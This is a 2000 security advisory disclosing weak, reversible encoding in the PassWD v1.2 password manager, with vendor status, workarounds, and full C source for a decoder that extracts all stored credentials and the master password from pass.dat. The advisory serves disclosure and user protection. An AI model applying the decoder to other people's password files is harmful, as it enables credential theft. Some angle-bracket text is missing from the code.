==[ Roe's Security Advisory # 1 (yeeha!) ]======[4th June 2000]== Insecure encryption in PassWD v1.2 Vulnerable: PassWD v1.2 for Windows 9x, NT and 2000 Vendor: Giordano Bigarelli Vendor location: http://web.tiscalinet.it/gbigarelli/ Advisory author: Daniel Roethlisberger Advisory location: http://www.roe.ch/download/advisory001.txt --[ Description ]------------------------------------------------ PassWD is a password managment software designed to store all the users user and password combinations along with a site URL. Due to the fact that PassWD is being spread by well-known free/shareware distro sites such as tucows.com, the community should be aware that it is very insecure. The documentation claims that PassWD employs encryption. In fact it uses a very weak coding that can easily be decoded. If an attacker can get hold of the password file (usually this will be pass.dat in PassWD's directory, which can be found in the Registry), he can easily decode the file and thus retrieve the user/password combinations along with the matching links, and the master password used to `protect' the password list. Also this is very easily exploitable by malware like password gathering trojans. --[ Vendor Status ]---------------------------------------------- The author of PassWD is informed. He is informing registered users of PassWD and any distribution sites offering PassWD v1.2 for download. The author is not developing PassWD v1.2 anymore. There will be no patch or update available. Instead there is a successing product called PassWD 2000, which will be released shortly. The author claims that it will employ a better (real) encryption algorithm. --[ Solution ]--------------------------------------------------- There's no real solution . One possible workaround is to install PassWD on an encrypted hard disk (eg. using PGPdisk or ScramDisk). Another is to wait for the successing product `PassWD 2000', which should be available shortly from the developers web site at http://web.tiscalinet.it/gbigarelli/ , which is where there is a beta version available already. Personally, I'd be wary of the beta version specifically and of PassWD 2000 in general, which I think is prudent unless source code review can verify that the product is as secure as it should be. After changing to a more secure solution, users of PassWD v1.2 will need to securely wipe their old pass.dat file (eg. using the secure wipe functions of PGP). --[ Details ]---------------------------------------------------- PassWD stores all the sensitive data in a file usually called pass.dat (this can be changed in PassWD's INI file). Unfortunately, it not only employs a very weak encoding algorithm, but it also hides the key in the same file. This key is purely random, and is in no way dependant on the master password. The key can take a value between 1 and 99, which shows the extreme weakness of the system. The charset consisting of 99 characters is simply rotated by positions. The below source code illustrates this. It can be used to decode any given PassWD v1.2 `pass.dat' file to either stdout or an output file. --[ Exploit Source ]--------------------------------------------- /* * Decoder for PassWD v1.2 `pass.dat' password files * * Written 2000 by Daniel Roethlisberger * * This code is hereby placed in the public domain. * Use this code at your own risk for whatever you want. * * The decoded data is not parsed in any way - it should * be very easy to moderately experienced programmers * to add that themselves. * */ #include void main(int argc, char *argv[]) { unsigned char charpos; FILE* outfile; FILE* infile; unsigned char a; unsigned char b; unsigned char key; unsigned char x; unsigned char charset[] = "\b\t\n\r !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\b\t\n\r !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~"; printf("\nDecoder for PassWD v1.2 `pass.dat' password files\n"); printf("Written 2000 by Daniel Roethlisberger \n\n"); if((argc > 3) || (argc < 2)) { printf("Usage: %s []\n\n", argv[0]); printf("If is omitted, the output is dumped to stdout.\n", argv[0]); return; } infile = fopen(argv[1], "r"); if(infile == NULL) { printf("Could not open file %s\n", argv[1]); return; } if(argc == 2) outfile = stdout; else { outfile = fopen(argv[2], "w"); if(outfile == NULL) { printf("Could not write to file %s\n", argv[2]); _fcloseall(); return; } } getc(infile); /* jump over decoy byte */ a = getc(infile); /* read encoded key byte 1 */ b = getc(infile); /* read encoded key byte 2 */ if(feof(infile)) { printf("ERROR - encountered EOF within header\n"); return; } /* this line `decodes' the key */ key = (unsigned char)((a - 'b') * 10 + (b - 'b')); /* read through infile and dump decoded output to outfile: */ x = getc(infile); while(!feof(infile)) { for(charpos = 0; x != charset[charpos]; charpos++) { if(charpos > 99) { printf("\nERROR - encountered illegal character in source file\n"); _fcloseall(); return; } } /* plain = cypher - key */ putc(charset[charpos + 99 - key], outfile); x = getc(infile); } if(argc == 2) printf("\n\n"); printf("Done.\n"); _fcloseall(); return; } --[ Credits/Disclaimer ]----------------------------------------- There was no reverse engineering involved in analysing this vulnerability, therefore this security advisory constitutes no violation of the user license agreement. Permission is hereby granted to copy or redistribute this advisory, but only in its entirety. Copyright (C) 2000 by Daniel Roethlisberger . Cheers, Dan